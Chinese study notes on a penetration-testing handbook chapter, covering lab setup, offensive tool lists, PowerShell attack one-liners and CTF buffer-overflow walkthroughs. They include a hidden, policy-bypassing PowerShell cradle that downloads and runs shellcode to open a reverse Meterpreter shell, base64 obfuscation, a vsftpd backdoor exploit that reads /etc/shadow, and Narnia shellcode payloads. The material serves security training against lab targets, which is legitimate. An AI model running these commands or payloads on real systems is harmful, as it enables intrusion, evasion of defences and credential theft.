《黑客秘笈——渗透测试实用指南》读书笔记(1)
渗透学习
1.1搭建测试环境
Linux和 Windows兼备
1.2建立一个域
1.3建立其他服务器
Metasploitable2(一个优秀的 Ubuntu Linux虚拟机)
下载地址:http://sourceforge.net/projects/metasploitable/files/Metasploitable2
OWASPBWA(漏洞网站多)
http://sourceforge .net/projects/owaspbwa/files/
1.4安装测试环境
1.4.1安装虚拟平台
VirtualBox(http://www.virtualbox.org)
VMWarePlayer(https://my.vmware.com/web/vmware/downloads)
在配置主机后,对干净状态和配置状态的虚拟机进行了快照。后面的测试中需要做到就是恢复虚拟机到基础镜像,对工具进行升级和打补丁或者添加其他需要的工具。
1.5硬件
测试笔记本
1、8G以上笔记本两个
2、500G硬盘(最好固态)
3、Intel酷睿i7四核处理器
密码破解桌面
机箱:海盗船复仇C70。
显卡:SAPPHIRE 100360SR Radeon R9 295x2 8GBGDDR5。
硬盘:三星840 EVO MZ-7TE500BW 2.5" 500GBSATA III TLC Internal固态盘。
电源:银欣ST1500 1500W ATX。
内存:海盗船复仇16GB(2×8GB)240针脚DDR3 SDRAM DDR3 1600。
CPU:酷睿i7 4790K 4.0G。
主板:华硕MAXIMUS VII FORMULA。
处理器风扇:酷冷至尊Hyper 212 EV。
1.6开发软件
商业软件
Burp Suite Pro
- Web渗透测试工具集
- 下载网址:http://portswigger.net/burp/proxy.html。强烈推荐购买专业版本,售价299美元,绝对物有所值。
Canvas
Cobalt Strike
Core Impact
Nessus
Nexpose
2.Kali Linux(https://www.kali.org/)
1.5.5 搭建Kali Linux
查看http://www.thehackerplaybook.com网页的更新。
所有的配置和软件部分放到了Github网址(http://www.github.com/cheetz/thp2)。通过复制和粘贴脚本,方便渗透测试工作,不需要手动输入每一个命令。
可以通过地址http://www.kali.org/downloads/下载Kali Linux发行版。强烈推荐下载VMware镜像(https://www.offensive-security.com/kali-linux-vmware-arm-image-download)和Virtual Player/VirtualBox。记住镜像文件采用gz压缩和tar存档格式,首先提取压缩和存档文件,然后加载vmx文件。
1.Kali虚拟机启动和运行
- 使用用户名root和默认密码toor登录
- 打开一个终端
- 修改密码
- passwd
- 更新镜像
- apt-get update
- apt-get dist-upgrade
- 设置Metasploit数据库
- service postgresql start
- 让postgresql数据库在启动时加载
- update-rc.dpostgresql enable
- 启动和停止Metasploit服务(设置数据库.yml文件)
- service metasploit start
- service metasploit stop
- 安装gedit软件
- apt-get install gedit
- 修改主机名(很多网络管理员在DHCP的日志中查询到多台命名为Kali的主机,最好遵循渗透测试公司的主机命名规则)
- gedit /etc/hostname
更改主机名(替换kali)并保存 - gedit /etc/hosts
更改主机名(替换kali)并保存 - reboot
- gedit /etc/hostname
- *Metasploit可选项——启动日志记录
- 作为可选项,如果启用日志就会变得很大,但是通过Metasploit命令行接口,可以记录运行的每一条命令和结果。如果客户需要日志记录或者开展批量攻击和查询,这将变得非常有用。*如果是干净的镜像,首先输入msfconsole,在配置logging命令创建.msf4文件夹之前退出。
- 在命令行中输入:
echo"spool /root/msf_console.log" > /root/.msf4/msfconsole.rc - 日志存储在/root/msf_console.log。
3.Back Box(http://www.backbox.org/
1.7 建立平台
| 探测扫描工具 |
|
| 安装Firefox插件 |
|
| Discover |
Discover Scripts
|
| EyeWitness |
|
| HTTPScreenShot |
|
| WMAP |
|
| SpiderFoot |
|
| Masscan |
|
| Gitrob |
|
| CMSmap |
|
| Recon-ng |
|
| SPARTA |
|
| WPScan |
|
| Password Lists |
|
| 漏洞利用工具
|
|
| Fuzzing Lists(SecLists) |
|
| Burp Suite Pro |
|
| ZAP Proxy Pro |
|
| NoSQLMap |
|
| SQLMap |
|
| SQLNinja |
|
| BeEF Exploitation Framework |
|
| Responder |
|
| Printer Exploits |
· git clone https://github.com/MooseDojo/praedasploit/opt/praedasploit |
| Veil |
Veil-Framework
|
| WIFIPhisher |
|
| Wifite |
|
| SET |
|
| 后渗透测试
|
|
| 本书中的自定义脚本 |
|
| SMBexec |
· git clone https://github.com/pentestgeek/smbexec.git/opt/smbexec
|
| Veil |
|
| WCE |
|
| Mimikatz |
|
| PowerSploit |
|
| Nishang |
|
| 后门制造工厂 |
|
| DSHashes |
|
| Net-Creds |
Net-Creds网络分析
|
| 代码副本 |
|
| Phishing(可选) |
|
1.8 设置Windows环境
搭建Windows通用测试平台作为KaliLinux平台的备份。记住一定要修改主机名,如果不使用NetBios,就禁用NetBios功能,要做的最后一件事是在评估过程中获取控制权。
设置Windows通常安装以下软件。
- HxD:下载地址为http://mh-nexus.de/en/hxd/
- Evade:下载地址为https://www.securepla.net/antivirus-now-you-see-me-now-you-dont
- Hyperion:下载地址为http://www.nullsecurity.net/tools/binary.html
- 下载并安装Windows编译器,地址为http://sourceforge.net/projects/mingw/
- 在Hyperion目录下运行make命令,就可以得到二进制文件。
- 下载并安装Metasploit,地址为http://www.Metasploit.com/
- 下载并安装Nessus或者Nexpose
- 如果打算购买商业软件,可以考虑购买Nessus,因为它更便宜,但是两个软件都能发挥作用。
- 下载并安装nmap,地址为http://nmap.org/download.html
- 下载并安装oclHashcat,地址为http://hashcat.net/oclhashcat/
- 下载并安装Cain and Abel,地址为http://www.oxid.it/cain.html
- 下载Burp Proxy Pro,地址为http://portswigger.net/burp/download.html
- 下载并解压Nishang,地址为https://github.com/samratashok/nishang
- 下载并安装PowerSploit,地址为https://github.com/mattifestation/PowerSploit/
- 安装Firefox插件
- Web开发人员插件:https://addons.mozilla.org/en-US/firefox/addon/webdeveloper/
- Tamper Data:https://addons.mozilla.org/en-US/firefox/ addon/tamper-data/
- Foxy Proxy:https://addons.mozilla.org/en-US/firefox/ addon/foxyproxystandard/
- User Agent Switcher:https://addons.mozilla.org/en-US/firefox/addon/useragent-switcher/
1.9 启动PowerShell
PowerShell功能,请观看这个视频:
- PowerShell脚本安全介绍:http://bit.ly/1MCb7EJ
PowerShell对于渗透测试人员有以下益处:
- Windows 7以上操作系统默认安装;
- PowerShell脚本可以运行在内存中;
- 几乎不会触发杀毒软件;
- 可以调用.NET类;
- 利用用户口令(查询活动目录);
- 可以用来管理活动目录;
- 远程执行PowerShell脚本;
- 使得Windows脚本攻击更加容易;
- 目前很多工具是基于PowerShell开发的,掌握这些工具帮助您成为能力出众、效率较高的渗透测试人员。
您可以通过Windows终端提示符输入“PowerShell”,进入PowerShell命令行,输入“help”命令显示帮助菜单。下面是本书用到的基本参数和基本设置。
- -Exec Bypass:绕过执行安全保护。
- 这个参数非常重要!默认情况下,PowerShell的安全策略不允许运行命令和文件。通过设置这个参数,可以绕过任何一个安全保护规则。在本书中,每一次运行PowerShell脚本时均使用这个参数。
- -NonI:非交互模式,PowerShell不提供用户交互式提示符。
- -NoProfile(或者 –NoP):PowerShell控制台不加载当前用户的配置。
- -noexit:执行后不退出shell。这对于脚本,例如键盘记录,非常重要,因此这些脚本可以继续执行。
- -W Hidden:设置会话的窗口风格,将命令窗口保持隐藏。
- 32位或64位PowerShell。
- 这非常重要。一些脚本仅仅能够运行在它们指定的平台。因此,如果是在64位平台,需要执行64位PowerShell脚本来运行命令。
- 32位PowerShell脚本执行:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass - 64位PowerShell脚本执行:
%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass
为了更好了解PowerShell的使用方法,下面介绍一些常用的执行命令(这些命令将在本书中使用)。
第一个命令是从网站服务器下载PowerShell脚本,并执行脚本。在很多情况下,通过命令行,在被攻击对象主机上下载MeterpreterPowerShell脚本:
- Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-ObjectNet.WebClient). DownloadString('[PowerShell URL]'); [Parameters]
例如,如果想在目标上执行Meterpreter Shell,需要下载这个脚本:
- https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1
我们同样需要知道使用什么参数。最简单的找到参数的方式是阅读PowerShell脚本源代码,获取和浏览Invoke--Shellcode.ps1文件。查看Mattifestationbianxie开发的Invoke--Shellcode.ps1文件,可以通过这个例子,了解如何调用反向https Meterpreter shell(见图1.1)。
最终的PowerShell命令看起来如下所示。
- Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient). DownloadString('https://raw.githubusercontent.com/cheetz/ PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https- Lhost 192.168.30.129 -Lport 80
图1.1 Invoke--Shellcode.ps1
可以看出,PowerShell使用非常简单,而且功能超级强大。下面了解更多的例子。
例如,下载同一个文件到目标上。您不需要访问网页,就可以自动下载和执行文件。在本地执行文件:
- powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "& { Import-Module [Path and File of PowerShell]; [Parameters] }"
最后,在本书中我通常使用base64编码PowerShell脚本,目的是混淆和压缩代码。运行和编码PowerShell脚本的命令如下:
- powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc [Base64 Code]
希望上述的例子能帮助您在渗透测试中娴熟地使用PowerShell。
1.10 Easy-P
因为本书大量应用PowerShell脚本实施攻击,所以我创建了一个小的脚本,用于在渗透测试过程中获取PowerShell脚本。Easy-P包括我常用的一些PowerShell工具,并且具有编码脚本的功能。
对于每个命令,Easy-P提供多种方式运行代码,包括本地和远端。注意所有的远程PowerShell脚本指向我的代码或者其他人代码的复制版本。在这里我要强调一点,在后面的章节中还会提到多次:记住要从源代码中复制自己的一个拷贝,这样您就不会盲目地运行其他人的代码。现在如果一些人恶意地随意篡改PowerShell脚本,您永远不会知道发生了什么。没有做什么或者更坏的情况是,您的shell将转向其他人指定的地址。下面了解一下Easy-P的功能(见图1.2),使渗透测试工作变得更加简单。
- cd /opt/Easy-P
- python ./easy-p.py
图1.2 THP Easy-P
我在本书中最经常做的一件事就是使用PowerShell Meterpreter脚本。当执行Easy-P脚本时,输入选项4。设置本地主机IP和Meterpreter脚本回连的端口。完成设置后,就能看到如图1.3所示的输出。
得到4个不同类型的输出。
- 从因特网下载和执行:从网站下载一个PowerShell脚本,然后执行脚本。虽然仅获得简单的shell,并且不能下载文件,但是也很棒了。
- 从脚本的一个本地副本运行:如果您已经将一个PowerShell文件下载到系统中,运行命令导入PowerShell脚本,然后执行脚本。
- Base64编码版本下载和执行:如果由于某个原因想混淆编码脚本,或者遇到字符限制,您可以使用base64编码代码,然后执行命令。
- 资源文件:最后输出的是关联的资源文件。Metasploit资源文件是一种快捷方式,自动为MeterpreterPowerShell建立监听程序。复制资源脚本并将它存成文件:/opt/listener.rc。
图1.3 Easy-P输出示例
所有的脚本已经配置成绕过执行策略,保持隐藏,以及非交互运行。看一下Easy-P其他菜单选项,还包括权限提升、横向渗透、键盘记录、PowerShellMeterpreter和修改用户执行策略等功能。请随意复制我的代码,然后修改、增加所需要的PowerShell代码。
1.11特别知识点
1.11.1 Metasploitable 2
在开始前,需要下载安装Metasploitable 2环境的VMWare镜像。
下载地址为http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
下载Metasploitable 2软件后,解压软件,并在VMware Player或者Virtual Box虚拟机中打开软件,输入用户名msfadmin和密码msfadmin登录软件。现在运行VM镜像文件。
试验环境
开始运行Nmap、Masscan或者其他漏洞工具,测试存在漏洞的虚拟机。一旦发现系统漏洞,就运行漏洞利用程序获取一个shell。举个例子,我们发现并且将利用vsftpd存在的缺陷。因此,可以搜索漏洞(搜索vsftpd,见图1.4)或者直接运行漏洞利用程序。
- msfconsole
- use exploit/unix/ftp/vsftpd_234_backdoor(选择漏洞)
- show options(显示配置选项)
- set RHOST [IP](设置Metasploitable 2 IP)
- exploit(运行漏洞)
图1.4 Metasploit例子
成功利用这个漏洞,读取存储的密码:cat /etc/shadow。为了深入研究Metasploitable 2,请阅读Rapid7指南,地址为https://community.rapid7.com/docs/DOC-1875。
这个虚拟机包括很多不同类型漏洞。您要花费时间学习如何有效使用Metasploit和Meterpreter。如果想深入了解Metasploit,推荐访问http://www.amazon.com/Metasploit-The-Penetration-Testers-Guide/dp/159327288X。
1.11.2二进制利用
请阅读下面的书籍:The Shellcoders Handbook(http://amzn.to/1E3k89R)或者Hacking: The Art of Exploitation,2nd Edition(http://amzn.to/1z8oThD)。然而,这并不意味着您不需要理解缓冲区溢出和基本漏洞技术。既然所有的渗透测试人员都需要能够编写脚本代码,那么他们也需要能理解漏洞利用代码。比如可能在Metasploit找到一个模块,它不能正常工作,需要较小的调整,或者需要验证从互联网下载的漏洞利用代码。
已经有大量不同类型网站,帮助开始学习二进制漏洞基础知识。一个非常好的学习网站是Over the Wire(http://overthewire.org/wargames/narnia/ )。Over the Wire网站是一个在线夺旗挑战站点,专注于从二进制攻击到网站攻击所有方面的知识。在本章,仅仅介绍二进制漏洞利用。如果您之前没有了解相关的背景知识,我建议用几个周末的时间深入研究这个网站。为了顺利进入情况,我先和您一起回答几个试题,然而后面的挑战试题需要您自己完成。
在开始前,需要学习以下基础知识:
- 基本的汇编语言和理解寄存器的使用;
- GDB基础知识(GNU调试器);
- 理解不同类型的内存段(栈、堆、数据、BSS和代码段);
- Shellcode基本概念。
下面这些资源可能会对学习有所帮助:
- http://opensecuritytraining.info/IntroX86.html
- http://www.reddit.com/r/hacking/comments/1wy610/exploit_tutorial_buffer_overflow/
- https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stackbased-overflows/
- http://www.lethalsecurity.com/wiki
- http://opensecuritytraining.info/Exploits1.html
- https://exploit-exercises.com/protostar/
1.11.3Narnia设置(http://overthewire.org/wargames/narnia/)
(1)阶段1
Narnia正确配置后,SSH登录到它们的服务器,所有的挑战位于/narnia/目录下。下面详细了解前三个例子。在Kali的终端提示符下或者在Windows下使用类似于Putty(http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html)的软件。
- ssh [email protected]
- Password: narnia0
- cd /narnia/
每一阶段挑战都提供C语言代码和二进制可执行文件。对于挑战0,具有访问narnia0和narnia0.c的权限。现在看一下C代码。
- cat narnia0.c
快速浏览代码(见图1.5)后,看到变量“val”被赋值十六进制“AAAA”。其次,可以看到,程序接受输入的缓冲区长度为20字节。在之后的一些行,scanf()函数允许最多输入24字节。这是非常简单的缓冲区溢出例子。现在运行可执行文件,作为测试,输入20个A和4个B(因为我们知道十六进制值A=41和B=42),在命令提示符下,显示的字符如下:
- narnia0@melinda:/narnia$ ./narnia0
- 修改val的值0x41414141 -> 0xdeadbeef!
- 这个是您的机会:AAAAAAAAAAAAAAAAAAAABBBB
- 缓冲区:AAAAAAAAAAAAAAAAAAAABBBB
- val:0x42424242
- 退出!!!!
图1.5 narnia0代码
太棒了!因为val十六进制值是0x42424242(42对应ASCII字母B),可以修改内存中val的值,之前这个值是0x41414141。现在需要做的就是修改内存值为0xdeadbeef。这里提醒一下,所有写到堆栈中的值必须是小端格式(http://en.wikipedia.org/wiki/Endianness ),这意味着0xdeadbeef最后的字节必须是第一个压到栈中的字节,从而覆盖val的值。目标机器栈机制是先进后出(FILO),或者说是后进先出(LIFO)的架构。因此,为了设置0xdeadbeef值,以“\xef\xbe\xad\xde”顺序写入。最简单的方式是使用Python语言生成所需的数值,并将其作为narnia0例子的输入值。请看下面的操作过程:
- narnia0@melinda:/narnia$ python -c 'print "A"*20 + "\xef\xbe\xad\xde"' | ./narnia0
- 修正val变量值从0x41414141 -> 0xdeadbeef!
- 这是机会:buf: AAAAAAAAAAAAAAAAAAAA?
- val: 0xdeadbeef
太棒了!现在已经将deadbeef值写入“val”变量中。那么如何运行shell命令呢?再查看C代码,可以看到,如果匹配deadbeef,/bin/sh将被调用。因此运行Python代码,并读取位于/etc/narnia_pass/narnia1的密钥:
- narnia0@melinda:/narnia$ (python -c 'print "A"*20 + "\xef\xbe\xad\xde"'; echo 'cat /etc/narnia_pass/narnia1') | /narnia/narnia0
- 修正val变量值从0x41414141到0xdeadbeef!
- 这是机会:缓冲区:AAAAAAAAAAAAAAAAAAAA?
- val: 0xdeadbeef
- [阶段1的答案]
如果成功了,就通过阶段1,并获得narnia1账户的口令(见图1.6)。现在需要注销账户并使用narnia1账户重新登录。
图1.6 narnia0漏洞利用
(2)阶段2
在完成每一个阶段后,都可以获得下一个账户的口令。使用刚刚获得narnia1账户登录阶段2:
- ssh [email protected]
- Password: [narnia1的密码]
- cd /narnia/
- cat narnia1.c
浏览这段C代码(见图1.7),很快可以看到一些操作。
- int (*ret)():是一个指向ret的指针,用于获取指针对应的数值。
- getenv:引入一个环境变量EGG并将值存入变量ret中。
- 调用ret()。
图1.7 narnia1代码
如果将shellcode存储在环境变量ECG中,那么无论shellcode是什么内容,它都将被执行。简单的做法是设置shellcode代码为/bin/sh,并将其赋值给ECG的环境 变量。
- 在这个例子中,将恶意代码设置为/bin/sh:http://shell-storm.org/shellcode/files/shellcode-811.php
- export EGG=‘python -c 'print"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\ x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"'`
- ./narnia1
- cat /etc/narnia_pass/narnia2
已经有了narnia2账户的密码(见图1.8),现在可以进入阶段3。
(3)阶段3
登录阶段3:
- ssh [email protected]
- Password: [narnia2的密码]
- cd /narnia/
- cat narnia2.c
图1.8 narnia1漏洞利用
浏览C代码,查看下面的代码:
- char buf[128];
- if(argc == 1){
- printf("Usage: %s argument\n",argv[0]);
- exit(1);
- }
- strcpy(buf,argv[1]);
- printf("%s",buf);
通过浏览代码可以看到,通过命令输入一个参数,并将它复制到缓冲区。字符串的缓冲区大小是128个字节,因此我们发送200个字符:
- narnia2@melinda:/narnia$ ./narnia2 'python -c 'print "A" * 200''
- 段错误
仅仅是验证,通过发送200个字符,造成程序出现段错误。需要判断发送多少字节,可以覆盖EIP寄存器。可以使用Metasploit的pattern_create.rb模块实现这个目的。这个模块生成一个特别字符串,在下面的例子中,创建200个字节的字符串。由于生成的字符串不会重复,因此能够精确识别出程序在什么位置覆盖EIP。
- /usr/share/metasploit-framework/tools/pattern_create.rb 200
- Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5A
b6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
d3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9A
f0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
现在运行程序narnia2,输入新生成的特殊字符串,观察在造成段错误之前,输入了多少个字节。为了获得段错误的精确结果,使用了调试器。默认情况下,Linux操作系统内嵌gdb调试器。尽管gdb调试器不是最容易使用的调试器,但是它的功能非常强大。
- gdb ./narnia2 -q
- run 'python -c' 'print"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5A
b6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A
d4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1A
f2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag"''
查询结果如图1.9所示。
图1.9 narnia2漏洞利用
- 程序接收SIGSEGV信号,段错误。
- 0x37654136 in ?? ()
命令输出结果是0x37654136。通过查看初始的字符串来查找精确的值。为了能够计算出造成段错误的准确字节数,使用Metasploit的pattern_offset.rb脚本:
- /usr/share/metasploit-framework/tools/pattern_offset.rb 0x37654136
- [*] Exact match at offset 140
这表明在140个字节后可以控制EIP。为了证明这个结果,运行narnia2程序,输入140个字节,使用另外的4个字节覆盖EIP。通过使用调试器来观察内存中的变化。
输出结果如下所示。
- cd /narnia
- gdb ./narnia2 -q
- (gdb) run 'python -c 'print "A" * 140 + "B" * 4'`
- Starting program: /games/narnia/narnia2 'python -c 'print "A" * 140 + "B" * 4'`
- Program received signal SIGSEGV,Segmentation fault.
- 0x42424242 in ?? ()
- (gdb) info registers
- eax 0x0 0
- ecx 0x0 0
- edx 0xf7fcb898 -134432616
- ebx 0xf7fca000 -134438912
- esp 0xffffd640 0xffffd640
- ebp 0x41414141 0x41414141
- esi 0x0 0
- edi 0x0 0
- eip 0x42424242 0x42424242
使用“B”字符(或者十六进制0x42)覆盖EIP,EIP是处理器下一步执行代码的指针。如果将EIP指向一段shellcode区域,就可以控制系统。那么到哪儿可以找到shellcode呢?可以定制shellcode或者从下面网址下载shellcode:http://shell-storm.org/shellcode/。在这个例子中,使用Linux/x86 - execve(/bin/sh),长度28个字节。shellcode长度是28个字节,净荷需要144个字节长度。将A替换为NOP或者0x90,这意味着程序跳到NOP时将继续执行,直到开始运行可执行代码。在使用空指令测试后,我创建了下列代码:
- cd /narnia
- gdb ./narnia2 -q
- run 'python -c 'print "\x90" * 50+
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\
x53\x89\xe1\xb0\x0b\xcd\x80" + "\x90" * 67 + "BBBB"'- 开始运行程序:/games/narnia/narnia2 `python -c 'print "\x90" *50+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\ x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "\ x90" * 67 + "BBBB"'
- 程序接收SIGSEGV信号,段错误。
- 0x42424242 in ?? ()
- (gdb) info registers eip
- eip 0x42424242 0x42424242
通过shellcode和NOP成功控制EIP的值。现在在NOP前放置shellcode,从而获得一个/bin/sh shell。为了能够看到出现段错误后内存中的内容,输入:
- x/250x $esp
滚动浏览,可以看到以下内容(见图1.10)。
图1.10 NOP Sled
可以看到初始的NOP (x90),后面是shellcode,然后是多个NOP,最后是BBBB。修改BBBB值,使其指向NOP,从而执行shellcode代码。一个简单的地址是0xffffd850栈地址,指向NOP中的第一个字符。开始进行测试,记住不要忘记系统是小段模式。
- (gdb) run 'python -c 'print "\x90" * 50 +"\x31\xc0\x50\x68\x2f\x2f
\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b
\xcd\x80" + "\x90" * 67 + "\x50\xd8\xff\xff"''- 开始运行程序:/games/narnia/narnia2 "python -c 'print "\x90" * 50
+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\
x53\x89\xe1\xb0\x0b\xcd\x8 0" + "\x90" * 67 + "\x50\xd8\xff\xff"'" - 进程5823执行新的程序:/bin/dash
- 开始运行程序:/games/narnia/narnia2 "python -c 'print "\x90" * 50
- $ cat /etc/narnia_pass/narnia3
- cat: /etc/narnia_pass/narnia3: Permission denied
现在可以运行shellcode,但是由于某种原因,不能够读取narnia3账户口令。可以尝试脱离GDB调试环境运行程序。
- narnia2@melinda:/narnia$ ./narnia2 'python -c 'print "\x90" * 50 +"\x31
\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\x
e1\xb0\x0b\xcd\x80" + "\x90" * 67 + "\x50\xd8\xff\xff"'` - $ cat /etc/narnia_pass/narnia3
- [这儿是narnia3答案]
终于发挥作用了!我们现在获得高权限的shell,并可以读取narnia3的密码(见图1.11)。希望通过这个例子,您能初步了解缓冲区溢出是如何产生以及如何进行漏洞利用。记住,这是一个二进制漏洞利用的起始阶段。现在可以用一些时间尝试其他的例子。
图1.11 narnia2漏洞利用
心得总结
说实话那么多工具最好按照功能和操作去区分,这样算下来就是搭建和安装的工作量大。其他的跑两遍就好了。